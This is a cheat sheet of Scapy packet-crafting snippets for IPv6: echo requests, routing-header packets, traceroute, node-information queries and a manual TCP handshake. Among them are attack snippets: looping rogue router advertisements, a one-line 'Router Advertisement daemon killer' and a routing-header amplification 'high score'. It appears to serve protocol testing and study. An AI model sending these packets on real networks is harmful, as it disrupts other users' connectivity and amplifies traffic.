1 IPv6 ICMP 2 icmp ipv6 request 3      4     i=IPv6() 5     i.dst="2001:db8:dead::1" 6     q=ICMPv6EchoRequest() 7     p=(i/q) 8     sr1(p)  9 ipv6 source route packets10     i=IPv6()11     i.dst="2001:db8:dead::1"12     h=IPv6ExtHdrRouting()13     h.addresses=["2001:db8:dead::1","2001:db8:dead::1","2001:db8:dead::1"]14     p=ICMPv6EchoRequest()15     pa=(i/h/p) 16 Routing Header Example17     a = sr1(IPv6(dst="2001:4f8:4:7:2e0:81ff:fe52:9a6b")/ \18     IPv6ExtHdrRouting(addresses=["2001:78:1:32::1", "2001:20:82:203:fea5:385"])/ \19     ICMPv6EchoRequest(data=RandString(7)), verbose=0)20     a.src 21 Traceroute22     waypoint = "2001:301:0:8002:203:47ff:fea5:3085"23     target = "2001:5f9:4:7:2e0:81ff:fe52:9a6b"24     traceroute6(waypoint, minttl=15 ,maxttl=34,l4=IPv6ExtHdrRouting(addresses=[target])/ICMPv6EchoRequest(data=RandString(7))) 25 Current high score (not tested)26       addr1 = "2001:4830:ff:12ea::2"27       addr2 = "2001:360:1:10::2"28       zz=time.time();29       a=sr1(IPv6(dst=addr2, hlim=255)/IPv6ExtHdrRouting(addresses=[addr1, addr2]*43)/ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80);30       print "%.2f seconds" % (time.time() - zz) 31 ipv6 NA (version 1)32     sendp(Ether()/IPv6()/ICMPv6ND_RA()/ ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", prefixlen=64)/ ICMPv6NDOptSrcLLAddr(lladdr="00:b0:de:ad:be:ef"), loop=1, inter=3) 33 ipv6 NA (version 2)34     a=IPv6(nh=58, src='fe80::214:f2ff:fe07:af0', dst='ff02::1', version=6L, hlim=255, plen=64, fl=0L, tc=224L)35     b=ICMPv6ND_RA(code=0, chlim=64, H=0L, M=0L, O=0L, routerlifetime=1800, P=0L, retranstimer=0, prf=0L, res=0L, reachabletime=0, type=134)36     c=ICMPv6NDOptSrcLLAddr(type=1, len=1, lladdr='00:14:f2:07:0a:f1')37     d=ICMPv6NDOptMTU(res=0, type=5, len=1, mtu=1500)38     e=ICMPv6NDOptPrefixInfo(A=1L, res2=0, res1=0L, L=1L, len=4, prefix='2001:db99:dead::', R=0L, validlifetime=2592000, prefixlen=64, preferredlifetime=604800, type=3)39     send(a/b/c/d/e)40 The one line Router Advertisement daemon killer41     send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1) 42 Test143     someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",44     "2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",45     "2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]46     47     for addr in someaddr: 48       a = sr1(IPv6(dst=addr)/ICMPv6NIQueryName(data=addr), verbose=0)49       print a.sprintf( "%-35s,src%: %data%") 50 Test251     someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",52     "2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",53     "2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]54     55     for addr in someaddr: 56       a = sr1(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))57       print a.sprintf( "%data%")58 59 IPv6 Scapy 3 Way60 Creating a IPv6 3 Way Handshake61  62 Step 1. 63 trun off the RST Packets from the Kernel, because no listen Port on the Source Port. (Scapy is not unsing RAW Socket)64 iptables -A OUTPUT -p tcp --tcp-flags RST RST -d {dest IP} -j DROP  65 Step 2. 66 Send th SYN Packet with scapy and fetch the answer.67     ip=IPv6(dst="2001:db8:0:1:207:3fff:fe68:df44")68     TCP_SYN=TCP(sport=1500, dport=80, flags="S", seq=100)        69     TCP_SYNACK=sr1(ip/TCP_SYN) 70 Step 3. 71 Send the ACK Packet with scapy72     my_ack = TCP_SYNACK.seq + 173     TCP_ACK=TCP(sport=1500, dport=80, flags="A", seq=101, ack=my_ack)74     send(ip/TCP_ACK) 75 Step 4. 76 Check the client with netstat -na